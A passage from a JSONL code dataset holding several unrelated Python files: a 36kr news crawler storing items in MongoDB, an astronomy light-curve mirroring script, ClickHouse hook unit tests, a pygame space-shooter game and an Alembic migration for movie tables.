main()\n","sub_path":"robosapiens-images.py","file_name":"robosapiens-images.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"506600285","text":"# -*- coding: utf-8 -*-\nimport os, sys, datetime\nfrom lxml import html\nfrom pyquery import PyQuery as pq\nimport gevent\nfrom gevent.event import Event\nfrom gevent import monkey; monkey.patch_all()\nimport 
json\n\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\n\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '..'))\nimport BaseCrawler\n\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../../../../util'))\nimport loghelper,extract,db,util,url_helper,download\n\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../../parser/util2'))\nimport parser_mysql_util\nimport parser_mongo_util\n\n#logger\nloghelper.init_logger(\"crawler_Kr36_newfs\", stream=True)\nlogger = loghelper.get_logger(\"crawler_Kr36_newfs\")\n\n#mongo\nmongo = db.connect_mongo()\ncollection_news = mongo.article.news\n\nnewsid = []\nb_id =\"\"\n\nTYPE = 60008\n\ndef find_companyId(sourceId):\n if sourceId== \"0\" or sourceId==0:\n return None\n conn = db.connect_torndb()\n sc = conn.get(\"select * from source_company where source=%s and sourceId=%s\", 13020, sourceId)\n if sc is not None:\n if sc[\"companyId\"] is not None:\n return sc[\"companyId\"]\n return None\n\n\n\nclass kr36Crawler(BaseCrawler.BaseCrawler):\n def __init__(self):\n BaseCrawler.BaseCrawler.__init__(self)\n\n def is_crawl_success(self, url, content):\n if content is not None:\n try:\n j = json.loads(content)\n # logger.info(j)\n except:\n return False\n\n if j.has_key(\"data\"):\n return True\n\n return False\n\nclass kr36NewsCrawler(BaseCrawler.BaseCrawler):\n def __init__(self):\n BaseCrawler.BaseCrawler.__init__(self)\n\n def is_crawl_success(self, url, content):\n if content.find(\"\") == -1:\n return False\n d = pq(html.fromstring(content.decode(\"utf-8\")))\n title = d('head> title').text().strip()\n logger.info(\"title: \" + title + \" \" + url)\n if title.find(\"36氪_为创业者提供最好的产品和服务\") != -1:\n return False\n if title.find(\"36氪\") >= 0:\n return True\n # logger.info(content)\n return False\n\n\ndef has_content(content):\n # logger.info(newsid)\n if content is not None:\n try:\n j = json.loads(content)\n except:\n logger.info(\"Not json content\")\n logger.info(content)\n return False\n if j[\"code\"] == 0:\n return True\n else:\n logger.info(\"code=%d, %s\" % (j[\"code\"], j[\"msg\"]))\n else:\n logger.info(\"Fail to get content\")\n return False\n\ndef has_news_content(item):\n if item.has_key(\"description\") is False:\n return False\n return True\n\n\ndef process_news(item):\n if has_news_content(item):\n\n\n news_time = datetime.datetime.strptime(item[\"published_at\"],\"%Y-%m-%d %H:%M:%S\")\n\n title = item[\"title\"]\n\n key = str(item[\"id\"])\n\n url = \"http://36kr.com/newsflashes/%s\" % key\n flag, domain = url_helper.get_domain(url)\n dnews = {\n \"date\": news_time - datetime.timedelta(hours=8),\n \"title\": title,\n \"link\": url,\n \"createTime\": datetime.datetime.now(),\n \"source\": 13020,\n \"key\": key,\n \"key_int\": int(key),\n \"type\": TYPE,\n \"original_tags\":[],\n \"processStatus\":0,\n # \"companyId\":companyId,\n \"companyIds\": [],\n \"category\": None,\n \"domain\": domain,\n \"categoryNames\": []\n }\n\n dcontents = []\n if item[\"description\"] is not None:\n dc = {\n \"rank\": 1,\n \"content\": \"36氪快讯\",\n \"image\": \"\",\n \"image_src\": \"\",\n }\n\n dcontents.append(dc)\n dc = {\n \"rank\": 2,\n \"content\": item[\"description\"],\n \"image\": \"\",\n \"image_src\": \"\",\n }\n dcontents.append(dc)\n if item.has_key(\"news_url\") is True and item[\"news_url\"] is not None:\n dc = {\n \"rank\": 3,\n \"content\": item[\"news_url\"],\n \"image\": \"\",\n \"image_src\": \"\",\n }\n dcontents.append(dc)\n 
logger.info(item[\"description\"])\n\n\n dnews[\"contents\"] = dcontents\n\n brief = util.get_brief_from_news(dcontents)\n\n post = util.get_posterId_from_news(dcontents)\n dnews[\"postId\"] = post\n # dnews[\"post\"] = post\n dnews[\"brief\"] = brief\n if news_time > datetime.datetime.now():\n logger.info(\"Time: %s is not correct with current time\", news_time)\n dnews[\"date\"] = datetime.datetime.now() - datetime.timedelta(hours=8)\n\n # collection_news.insert(dnews)\n nid = parser_mongo_util.save_mongo_news(dnews)\n logger.info(\"Done: %s\", nid)\n\n\n\n\ndef process_page(content, flag):\n logger.info(newsid)\n while True:\n if len(newsid) == 0:\n break\n newsid.pop(0)\n bid = None\n j = json.loads(content)\n infos = j[\"data\"][\"items\"]\n if infos is not None:\n for info in infos:\n key = info[\"id\"]\n title = info[\"title\"]\n date = info[\"published_at\"]\n # logger.info(\"%s, %s, %s\", key, date, title)\n\n if collection_news.find_one({\"source\": 13020, \"key_int\": int(key), \"type\":60008}) is None or flag == \"all\":\n craw = True\n newses = list(collection_news.find({\"title\": title}))\n for news in newses:\n if news.has_key(\"type\") and news[\"type\"] > 0:\n craw = False\n break\n if craw:\n logger.info(\"%s, %s, %s\", key, date, title)\n newsid.append(key)\n process_news(info)\n\n bid = key\n\n return len(newsid), bid\n\n\ndef start_run(flag):\n logger.info(newsid)\n global b_id\n while True:\n logger.info(\"36kr news %s start...\", flag)\n\n crawler = kr36Crawler()\n while True:\n page_url = \"http://36kr.com/api/newsflash?b_id%s=&per_page=20\" % b_id\n\n result = crawler.crawl(page_url, agent=True)\n if result['get'] == 'success':\n if has_content(result[\"content\"]):\n numnews, b_id = process_page(result[\"content\"], flag)\n if numnews > 0 or flag == \"all\":\n logger.info(\"crawler new news :%s\", numnews)\n # logger.info(\"news: %s\", \";\".join(newsid))\n # continue\n else:\n b_id = \"\"\n else:\n b_id = \"\"\n logger.info(\"no content\")\n logger.info(result[\"content\"])\n break\n\n\n logger.info(\"36kr news %s end.\", flag)\n\n if flag == \"incr\":\n gevent.sleep(60*5) #10 minutes\n else:\n gevent.sleep(86400*3) #3 days\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n param = sys.argv[1]\n if param == \"all\":\n start_run(\"all\")\n else:\n start_run(\"incr\")\n else:\n start_run(\"incr\")","sub_path":"data/spider2/crawler/news/kr36_flashes.py","file_name":"kr36_flashes.py","file_ext":"py","file_size_in_byte":7442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"129064313","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef interpolate_x(X, Y, y):\r\n return X[0] + ((y - X[1])*(Y[0] - X[0]))/(Y[1] - X[1])\r\n\r\n\r\ndef interpolate_y(X, Y, x):\r\n return X[1] + ((x - X[0])*(Y[1] - X[1]))/(Y[0] - X[0])\r\n\r\n\r\ndef mirror_data(x_input, y_input, ind, refl):\r\n if ind is not None:\r\n x_mir = x_input[ind] + (x_input[ind] - x_input)\r\n else:\r\n x_mir = refl + (refl - x_input)\r\n y_mir = y_input\r\n\r\n return x_mir, y_mir\r\n\r\n\r\ndef cut_data(x_input, y_input, x_mir, y_mir):\r\n if x_input[0] <= x_mir[-1]:\r\n left_limit = x_mir[-1]\r\n else:\r\n left_limit = x_input[0]\r\n\r\n if x_input[-1] >= x_mir[0]:\r\n right_limit = x_mir[0]\r\n else:\r\n right_limit = x_input[-1]\r\n\r\n x_input_cut = x_input[(left_limit < x_input) & (x_input < right_limit)]\r\n x_mir_cut = x_mir[(left_limit < x_mir) & (x_mir < right_limit)]\r\n y_input_cut = y_input[(left_limit < x_input) 
& (x_input < right_limit)]\r\n y_mir_cut = y_mir[(left_limit < x_mir) & (x_mir < right_limit)]\r\n\r\n return x_input_cut, y_input_cut, x_mir_cut, y_mir_cut\r\n\r\n\r\ndef cut_data2(x_input1, y_input1, x_input2, y_input2):\r\n if x_input1[0] < x_input2[0]:\r\n left_limit = x_input2[0]\r\n else:\r\n left_limit = x_input1[0]\r\n\r\n if x_input1[-1] > x_input2[-1]:\r\n right_limit = x_input2[-1]\r\n else:\r\n right_limit = x_input1[-1]\r\n\r\n x_input1_cut = x_input1[(left_limit < x_input1) & (x_input1 < right_limit)]\r\n x_input2_cut = x_input2[(left_limit < x_input2) & (x_input2 < right_limit)]\r\n y_input1_cut = y_input1[(left_limit < x_input1) & (x_input1 < right_limit)]\r\n y_input2_cut = y_input2[(left_limit < x_input2) & (x_input2 < right_limit)]\r\n\r\n return x_input1_cut, y_input1_cut, x_input2_cut, y_input2_cut\r\n\r\n\r\ndata = np.genfromtxt('aptau_20141028_2.lc', unpack=True)\r\nhjd = data[0]\r\nmag = data[1]\r\n\r\n# Define the mag limits\r\nymax = max(mag)\r\nif mag[0] > mag[-1]:\r\n ymin = mag[0]\r\nelse:\r\n ymin = mag[-1]\r\n\r\n# Time step in checking the minimum\r\ntime_step = 0.1/86400\r\n\r\n# Initial reflexion axis\r\nreflex_index = np.argmax(mag)\r\nreflex_axis = hjd[reflex_index]\r\n\r\n# Mirroring data\r\nhjd_mirror, mag_mirror = mirror_data(hjd, mag, ind=None, refl=reflex_axis)\r\n\r\n# Linear interpolation to get two magnitude points for one time point\r\nhjd_inter = np.array([])\r\nmag_inter = np.array([])\r\nfor i in range(len(hjd_mirror)):\r\n for j in range(len(hjd)):\r\n if hjd[j] < hjd_mirror[i] <= hjd[j+1]:\r\n hjd_inter = np.append(hjd_inter, hjd_mirror[i])\r\n mag_inter = np.append(mag_inter, interpolate_y([hjd[j], mag[j]], [hjd[j+1], mag[j+1]], hjd_mirror[i]))\r\n\r\nif hjd_inter[0] < hjd_inter[-1]:\r\n left = hjd_inter[0]\r\n right = hjd_inter[-1]\r\nelse:\r\n left = hjd_inter[-1]\r\n right = hjd_inter[0]\r\n\r\n# Cut out the region with two points for one time point (to eliminate standalone points)\r\nhjd_cut = hjd_mirror[(hjd_mirror >= left) & (hjd_mirror <= right)]\r\nmag_cut = mag_mirror[(hjd_mirror >= left) & (hjd_mirror <= right)]\r\n\r\n# Calculate chi square for this cut out\r\nchi_sq = np.sum((mag_cut - mag_inter)**2)\r\n\r\n# for i in range(len(mag_inter)):\r\n# print(i)\r\n# plt.plot(hjd, mag, '.b', hjd_mirror, mag_mirror, '.k', hjd_cut[i], mag_cut[i], 'or', hjd_inter[i], mag_inter[i], 'ok')\r\n# plt.show()\r\n\r\n# plt.figure(0)\r\n# plt.plot(hjd, mag, '.b', hjd_mirror, mag_mirror, '.k', hjd_inter, mag_inter, 'or', hjd_cut, mag_cut, '.r', mfc='none')\r\n# plt.axvline(hjd_inter[0])\r\n# plt.axvline(hjd_inter[-1])\r\n# print(len(mag_cut), len(mag_inter))\r\nplt.figure(1)\r\nplt.plot(hjd_cut, mag_cut, '.b', hjd_inter, mag_inter, '.r')\r\nplt.title('Chi square = {}'.format(chi_sq))\r\nplt.show()\r\n","sub_path":"kwee_2.2.py","file_name":"kwee_2.2.py","file_ext":"py","file_size_in_byte":3691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"194445298","text":"from unittest import TestCase, mock\n\nfrom clickhouse_driver.errors import ServerException, ErrorCodes\n\nfrom tests.util import LocalClickHouseHook\n\n\nclass ClientFromUrlTestCase(TestCase):\n def test_temp_table(self):\n hook = LocalClickHouseHook()\n temp_table_name = 'test_temp_table'\n result = hook.run((\n f'CREATE TEMPORARY TABLE {temp_table_name} (test_field UInt8)',\n f'INSERT INTO {temp_table_name} '\n f'SELECT number FROM system.numbers WHERE number < 5 LIMIT 5',\n f'SELECT SUM(test_field) FROM {temp_table_name}',\n ))\n 
self.assertListEqual([(10,)], result)\n try:\n # a new connection is created\n hook.run(f'SELECT * FROM {temp_table_name}')\n except ServerException as err:\n self.assertEqual(ErrorCodes.UNKNOWN_TABLE, err.code)\n else:\n raise AssertionError('server did not raise an error')\n\n\nclass HookLogQueryTestCase(TestCase):\n def setUp(self) -> None:\n self.hook = LocalClickHouseHook()\n\n def test_log_params_dict(self):\n self.assertEqual('{}', self.hook._log_params({}))\n self.assertEqual('{1: 1}', self.hook._log_params({1: 1}))\n self.assertEqual('{1: 1}', self.hook._log_params({1: 1}, limit=1))\n self.assertEqual(\n '{1: 1 … and 1 more parameters}',\n self.hook._log_params({1: 1, 2: 2}, limit=1),\n )\n self.assertEqual(\n '{1: 1, 2: 2}',\n self.hook._log_params({1: 1, 2: 2}),\n )\n self.assertEqual(\n '{0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7, 8: 8, 9: 9 …'\n ' and 1 more parameters}',\n self.hook._log_params({k: k for k in range(11)}),\n )\n self.assertEqual(\n '{0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7, 8: 8, 9: 9 …'\n ' and 10 more parameters}',\n self.hook._log_params({k: k for k in range(20)}),\n )\n self.assertEqual(\n '{0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7, 8: 8, 9: 9 …'\n ' and 10 more parameters}',\n self.hook._log_params({k: k for k in range(20)}, limit=10),\n )\n\n def test_log_params_generator(self):\n def gen():\n yield\n g = gen()\n self.assertEqual(str(g), self.hook._log_params(g))\n\n def test_log_params_tuple(self):\n self.assertEqual('()', self.hook._log_params(()))\n self.assertEqual('(1,)', self.hook._log_params((1, )))\n self.assertEqual('(1,)', self.hook._log_params((1, ), limit=1))\n self.assertEqual(\n '(1, … and 1 more parameters)',\n self.hook._log_params((1, 2), limit=1),\n )\n self.assertEqual(\n '(1, 2)',\n self.hook._log_params((1, 2)),\n )\n self.assertEqual(\n '(0, 1, 2, 3, 4, 5, 6, 7, 8, 9 … and 1 more parameters)',\n self.hook._log_params(tuple(range(11))),\n )\n self.assertEqual(\n '(0, 1, 2, 3, 4, 5, 6, 7, 8, 9 … and 10 more parameters)',\n self.hook._log_params(tuple(range(20))),\n )\n self.assertEqual(\n '(0, 1, 2, 3, 4, 5, 6, 7, 8, 9 … and 10 more parameters)',\n self.hook._log_params(tuple(range(20)), limit=10),\n )\n\n def test_log_params_list(self):\n self.assertEqual('[]', self.hook._log_params([]))\n self.assertEqual('[1]', self.hook._log_params([1]))\n self.assertEqual('[1]', self.hook._log_params([1], limit=1))\n self.assertEqual(\n '[1 … and 1 more parameters]',\n self.hook._log_params([1, 2], limit=1),\n )\n self.assertEqual(\n '[1, 2]',\n self.hook._log_params([1, 2]),\n )\n self.assertEqual(\n '[0, 1, 2, 3, 4, 5, 6, 7, 8, 9 … and 1 more parameters]',\n self.hook._log_params(list(range(11))),\n )\n self.assertEqual(\n '[0, 1, 2, 3, 4, 5, 6, 7, 8, 9 … and 10 more parameters]',\n self.hook._log_params(list(range(20))),\n )\n self.assertEqual(\n '[0, 1, 2, 3, 4, 5, 6, 7, 8, 9 … and 10 more parameters]',\n self.hook._log_params(list(range(20)), limit=10),\n )\n\n def test_log_query(self):\n _ = self.hook.log # to initialize .log property\n with mock.patch.object(self.hook, '_log') as patched:\n self.hook._log_query('SELECT 1', {})\n patched.info.assert_called_with('%s%s', 'SELECT 1', '')\n self.hook._log_query('SELECT 1', {1: 1})\n patched.info.assert_called_with('%s%s', 'SELECT 1', ' with {1: 1}')\n self.hook._log_query('SELECT 1', [1])\n patched.info.assert_called_with('%s%s', 'SELECT 1', ' with [1]')\n\n\nclass HookGetAsPandasTestCase(TestCase):\n def test_get_pandas_df(self):\n import pandas as pd\n\n hook = 
LocalClickHouseHook()\n for sql, expected in (\n (\n '''\n SELECT\n number,\n concat('result: ', toString(number + number)) AS n_sum\n FROM system.numbers\n WHERE number < 4\n LIMIT 3\n ''',\n pd.DataFrame.from_dict({\n 'number': (0, 1, 2),\n 'n_sum': ('result: 0', 'result: 2', 'result: 4'),\n })\n ),\n # empty df\n (\n '''\n SELECT\n number,\n concat('result: ', toString(number + number)) AS n_sum\n FROM (\n SELECT number\n FROM system.numbers\n WHERE number < 4\n LIMIT 3\n )\n WHERE number > 4\n ''',\n pd.DataFrame(columns=['number', 'n_sum'])\n )\n ):\n df = hook.get_pandas_df(sql)\n self.assertListEqual(list(df.columns), list(expected.columns))\n self.assertListEqual(\n df.to_dict('records'),\n expected.to_dict('records'),\n )\n","sub_path":"tests/test_hook.py","file_name":"test_hook.py","file_ext":"py","file_size_in_byte":6174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"495337676","text":"import pygame\nimport random\nimport sys\n\npygame.init()\nWIDTH, HEIGHT = 750, 750\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"Space Shooter\")\nclock = pygame.time.Clock()\nblock_size = 75\nwhite = (255, 255, 255)\nred = (200, 0, 0)\npygame.font.init()\nmyfont = pygame.font.SysFont('Comic Sans MS', 30)\nyou_lost_font = pygame.font.SysFont('Comic Sans MS', 40)\n\n# Load images\nspaceship = pygame.image.load(\"spaceship.png\")\nblue_laser = pygame.image.load(\"blue_laser.png\")\ngreenlaser = pygame.image.load(\"greenlaser.png\")\nred_laser = pygame.image.load(\"redlaser.png\")\nblue_enemy_ship = pygame.image.load(\"blue_enemy.png\")\ngrey_enemy_ship = pygame.image.load(\"grey_enemy.png\")\nbackground = pygame.image.load(\"background.png\")\nbackground = pygame.transform.scale(background, (WIDTH, HEIGHT)) # to match the size of our window\nspaceship = pygame.transform.scale(spaceship, (100, 100))\nblue_laser = pygame.transform.scale(blue_laser, (20, 50))\ngreenlaser = pygame.transform.scale(greenlaser, (20, 50))\nred_laser = pygame.transform.scale(red_laser, (block_size, block_size))\nblue_enemy_ship = pygame.transform.scale(blue_enemy_ship, (block_size, block_size))\ngrey_enemy_ship = pygame.transform.scale(grey_enemy_ship, (100, 100))\ncosmos = pygame.image.load(\"cosmos.jpg\")\ncosmos = pygame.transform.scale(cosmos, (WIDTH, HEIGHT))\nback = pygame.image.load(\"back!.png\")\nback = pygame.transform.scale(back, (160, 100))\nback.set_colorkey((0, 0, 0))\n\n\nclass Laser:\n def __init__(self, x, y, img):\n self.x = x\n self.y = y\n self.img = img\n self.mask = pygame.mask.from_surface(self.img)\n\n def draw(self, window):\n window.blit(self.img, (self.x, self.y))\n\n def move(self, vel):\n self.y += vel\n\n def off_screen(self, height):\n return not (self.y <= height and self.y >= 0)\n\n def collision(self, obj):\n return collide(self, obj)\n\n\nclass Ship:\n COOLDOWN = 30\n\n def __init__(self, x, y, health=100):\n self.x = x\n self.y = y\n self.health = health\n self.ship_img = None\n self.laser_img = None\n self.lasers = []\n self.cool_down_counter = 0\n\n def draw(self, window):\n window.blit(self.ship_img, (self.x, self.y))\n # those we need to make boundaries for spaceship's movements, so it wouldn't get outside of the screen\n for laser in self.lasers:\n laser.draw(window)\n\n def move_lasers(self, vel, obj):\n self.cooldown()\n for laser in self.lasers:\n laser.move(vel)\n if laser.off_screen(HEIGHT):\n self.lasers.remove(laser)\n elif laser.collision(obj):\n obj.health -= 10\n 
self.lasers.remove(laser)\n\n def cooldown(self):\n if self.cool_down_counter >= self.COOLDOWN:\n self.cool_down_counter = 0\n elif self.cool_down_counter > 0:\n self.cool_down_counter += 1\n\n def get_width(self):\n return self.ship_img.get_width()\n\n def get_height(self):\n return self.ship_img.get_height()\n\n def shoot(self):\n if self.cool_down_counter == 0:\n laser = Laser(self.x + 15, self.y, self.laser_img)\n self.lasers.append(laser)\n self.cool_down_counter = 1\n\n\nclass Player(Ship):\n def __init__(self, x, y, health=100):\n super().__init__(x, y, health)\n self.ship_img = spaceship\n self.laser_img = red_laser\n self.mask = pygame.mask.from_surface(self.ship_img)\n self.max_health = health\n\n def move_lasers(self, vel, objs):\n self.cooldown()\n for laser in self.lasers:\n laser.move(vel)\n if laser.off_screen(HEIGHT):\n self.lasers.remove(laser)\n else:\n for obj in objs:\n if laser.collision(obj): # remove if laser collide\n objs.remove(obj)\n if laser in self.lasers:\n self.lasers.remove(laser)\n\n def draw(self, window): # implement draw method of the player shifts\n super().draw(window)\n self.healthbar(window)\n\n def healthbar(self, window): # hunam takes self\n pygame.draw.rect(window, (255, 0, 0),\n (self.x, self.y + self.ship_img.get_height() + 10, self.ship_img.get_width(), 10))\n pygame.draw.rect(window, (0, 255, 0), (\n self.x, self.y + self.ship_img.get_height() + 10,\n self.ship_img.get_width() * (self.health / self.max_health),\n 10))\n # 1st RED-length of the player, 2nd GREEN-on tip of the red (be only the length of the health)\n # ex. (255,0,0)-red color; (self.x, self.y + self.ship_img.get_height() + 10- we want to be sure tha health bar is below our player(so we want to get y value of the player add height of the shipp and ten pixels and then start drawing)\n # self.ship_img.get_width() * (self.health/self.max_health - what % of the width we should draw\n\n\nclass Enemy(Ship):\n # those we will need when we add our own pictures\n COLOR_MAP = {\n \"blue\": (blue_enemy_ship, blue_laser),\n \"grey\": (grey_enemy_ship, greenlaser)\n }\n\n def __init__(self, x, y, color, health=100):\n super().__init__(x, y, health)\n self.ship_img, self.laser_img = self.COLOR_MAP[color]\n self.mask = pygame.mask.from_surface(self.ship_img)\n\n def move_enemy(self, vel):\n self.y += vel\n\n def shoot(self):\n if self.cool_down_counter == 0:\n laser = Laser(self.x + 35, self.y, self.laser_img)\n self.lasers.append(laser)\n self.cool_down_counter = 1\n\n\ndef collide(obj1, obj2):\n offset_x = obj2.x - obj1.x # distance from obj1 to obj2 returns vector\n offset_y = obj2.y - obj1.y\n return obj1.mask.overlap(obj2.mask, (offset_x, offset_y)) != None # is obj1 overlapping obj2( given two masks\n\n\ndef main(menu):\n run = True\n fps = 60\n level = 0\n lives = 5\n main_font = pygame.font.SysFont(\"comicsans\", 50)\n lost_font = pygame.font.SysFont(\"comicsans\", 60)\n\n enemies = []\n wave_length = 5\n enemy_vel = 1\n\n player_vel = 5\n laser_vel = 5\n\n player = Player(300, 630)\n\n clock = pygame.time.Clock()\n\n lost = False\n lost_count = 0\n\n def update_window(): # in order to update the screen\n screen.blit(background, (0, 0))\n lives_label = main_font.render(f\"Lives: {lives}\", 1, (255, 255, 255)) # f takes the value of the brackets\n level_label = main_font.render(f\"Level: {level}\", 1, (255, 255, 255))\n\n screen.blit(lives_label, (10, 10))\n screen.blit(level_label, (WIDTH - level_label.get_width() - 10, 10))\n\n for enemy in enemies:\n enemy.draw(screen)\n\n 
player.draw(screen)\n\n if lost:\n you_lost_label = you_lost_font.render(\"Game over\", 1, (255, 255, 255))\n screen.blit(you_lost_label, (WIDTH / 2 - you_lost_label.get_width() / 2, 350))\n\n pygame.display.update()\n\n while run:\n clock.tick(fps)\n update_window()\n # if you lost then FREEZE\n if lives <= 0 or player.health <= 0:\n lost = True\n lost_count += 1\n\n if lost:\n if lost_count > fps * 3:\n run = False\n else:\n continue\n\n if len(enemies) == 0:\n level += 1\n wave_length += 5\n enemy_vel += 1\n # this is for the enemies fall down at random positions positions\n for i in range(wave_length):\n enemy = Enemy(random.randrange(50, WIDTH - 100), random.randrange(-1500, -100),\n random.choice([\"grey\", \"blue\"]))\n enemies.append(enemy)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n quit()\n\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT] and player.x - player_vel > 0: # left\n player.x -= player_vel\n if keys[pygame.K_RIGHT] and player.x + player_vel + player.get_width() < WIDTH: # right\n player.x += player_vel\n if keys[pygame.K_UP] and player.y - player_vel > 0: # up\n player.y -= player_vel\n if keys[pygame.K_DOWN] and player.y + player_vel + player.get_height() + 15 < HEIGHT: # down\n player.y += player_vel\n if keys[pygame.K_SPACE]:\n player.shoot()\n if keys[pygame.K_ESCAPE]:\n game.menu()\n\n for enemy in enemies[:]:\n # everytime they are on the screen move them down with their velocities\n enemy.move_enemy(enemy_vel)\n # everytime we don't kill the enemies we get lesser number of lives\n enemy.move_lasers(laser_vel, player)\n\n if random.randrange(0, 2 * 60) == 1:\n enemy.shoot()\n\n if collide(enemy, player):\n if player.health == 10:\n if lives <= 0:\n lost = True\n else:\n player.health = player.max_health\n lives -= 1\n enemies.remove(enemy)\n else:\n player.health -= 10\n enemies.remove(enemy)\n elif enemy.y + enemy.get_height() > HEIGHT:\n if lives <= 0:\n lost = True\n else:\n lives -= 1\n enemies.remove(enemy)\n\n player.move_lasers(-laser_vel, enemies) # shoot upward, not downward\n pygame.quit()\n\n\nfps = 60\n\n\ndef help(menu):\n screen.blit(cosmos, (0, 0))\n screen.blit(back, (0, 600))\n text = you_lost_font.render(\"helpdkjanckjjd\", True, white)\n screen.blit(text, (170, 100))\n for e in pygame.event.get():\n if e.type == pygame.MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n rect = back.get_rect(topleft=(0, 600)) # hitbox must match where the button is blitted\n if rect.collidepoint(pos):\n game.menu()\n pygame.display.flip()\n clock.tick(fps)\n\n\ndef tool(menu):\n screen.blit(cosmos, (0, 0))\n screen.blit(back, (0, 600))\n text = you_lost_font.render(\"tool\", True, white)\n screen.blit(text, (170, 100))\n for e in pygame.event.get():\n if e.type == pygame.MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n rect = back.get_rect(topleft=(0, 600)) # hitbox must match where the button is blitted\n if rect.collidepoint(pos):\n menu.state = \"menu\"\n print(\"Tried to return to menu\")\n pygame.display.flip()\n clock.tick(fps)\n\n\nclass Menu:\n state = \"menu\"\n\n def __init__(self, punkts=[200, 300, 'Punkts', white, red, 2]):\n self.punkts = punkts\n\n def render(self, poverhnost, font, num_punkt): # drawing\n for i in self.punkts:\n if num_punkt == i[5]: # if the cursor is over the current item, it is drawn in red\n poverhnost.blit(font.render(i[2], 1, i[4]), (i[0], i[1]))\n else:\n poverhnost.blit(font.render(i[2], 1, i[3]), (i[0], i[1])) # otherwise it is not highlighted\n\n def menu(self):\n global state\n fps = 60\n done = True\n font_menu = pygame.font.SysFont(\"comicsans\", 120)\n punkt = 0\n pygame.key.set_repeat(0, 0) # disabled key repeat
\n pygame.mouse.set_visible(True) # made the cursor visible\n while done:\n if self.state == \"menu\":\n mp = pygame.mouse.get_pos()\n for i in self.punkts:\n if mp[0] > i[0] and mp[0] < i[0] + 300 and mp[1] > i[1] and mp[1] < i[\n 1] + 100: # checking whether the cursor intersects a menu item or not\n punkt = i[5]\n screen.blit(cosmos, (0, 0))\n self.render(screen, font_menu, punkt)\n\n for e in pygame.event.get():\n if e.type == pygame.QUIT:\n sys.exit()\n if e.type == pygame.KEYDOWN:\n if e.key == pygame.K_ESCAPE:\n sys.exit()\n if e.key == pygame.K_UP:\n if punkt > 0:\n punkt -= 1\n if e.key == pygame.K_DOWN:\n if punkt < len(self.punkts) - 1:\n punkt += 1\n if e.type == pygame.MOUSEBUTTONDOWN and e.button == 1:\n if punkt == 0: # clicking Game starts the game\n self.state = \"play\"\n if punkt == 1: # clicking Tools opens the tools screen\n self.state = \"tool\"\n if punkt == 2:\n self.state = \"help\"\n\n pygame.display.flip()\n clock.tick(fps)\n\n if self.state == \"play\":\n main(self)\n\n if self.state == \"help\":\n help(self)\n\n if self.state == \"tool\":\n tool(self)\n\n\npunkts = [(240, 220, 'Game', white, red, 0),\n (260, 340, 'Tools', white, red, 1),\n (280, 460, 'Help', white, red, 2)]\ngame = Menu(punkts)\ngame.menu()","sub_path":"pygame_olala.py","file_name":"pygame_olala.py","file_ext":"py","file_size_in_byte":13435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"182744233","text":"\"\"\"movies table\n\nRevision ID: 76dfc0fdc93e\nRevises: \nCreate Date: 2019-06-29 18:27:54.506377\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '76dfc0fdc93e'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('Genres')\n op.drop_table('Directors')\n op.drop_table('sqlite_sequence')\n op.drop_table('GenreMovieMap')\n op.drop_table('Movies')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('Movies',\n sa.Column('MovieID', sa.INTEGER(), nullable=False),\n sa.Column('Name', sa.TEXT(), nullable=True),\n sa.Column('DirectorID', sa.INTEGER(), nullable=True),\n sa.Column('IMDBScore', sa.REAL(), nullable=True),\n sa.Column('Popularity', sa.REAL(), nullable=True),\n sa.Column('CreatedOn', sa.TIMESTAMP(), nullable=True),\n sa.Column('LastModifiedDt', sa.TIMESTAMP(), nullable=True),\n sa.PrimaryKeyConstraint('MovieID')\n )\n op.create_table('GenreMovieMap',\n sa.Column('GenreMovieMapID', sa.INTEGER(), nullable=False),\n sa.Column('GenreID', sa.INTEGER(), nullable=True),\n sa.Column('MovieID', sa.INTEGER(), nullable=True),\n sa.Column('CreatedOn', sa.TIMESTAMP(), nullable=True),\n sa.PrimaryKeyConstraint('GenreMovieMapID')\n )\n op.create_table('sqlite_sequence',\n sa.Column('name', sa.NullType(), nullable=True),\n sa.Column('seq', sa.NullType(), nullable=True)\n )\n op.create_table('Directors',\n sa.Column('DirectorID', sa.INTEGER(), nullable=False),\n sa.Column('Name', sa.TEXT(), nullable=True),\n sa.Column('CreatedOn', sa.TIMESTAMP(), nullable=True),\n sa.PrimaryKeyConstraint('DirectorID')\n )\n op.create_table('Genres',\n sa.Column('GenreID', sa.INTEGER(), nullable=False),\n sa.Column('Genre', sa.TEXT(), nullable=False),\n sa.Column('CreatedOn', sa.TIMESTAMP(), nullable=True),\n sa.PrimaryKeyConstraint('GenreID')\n )\n # ### end Alembic commands 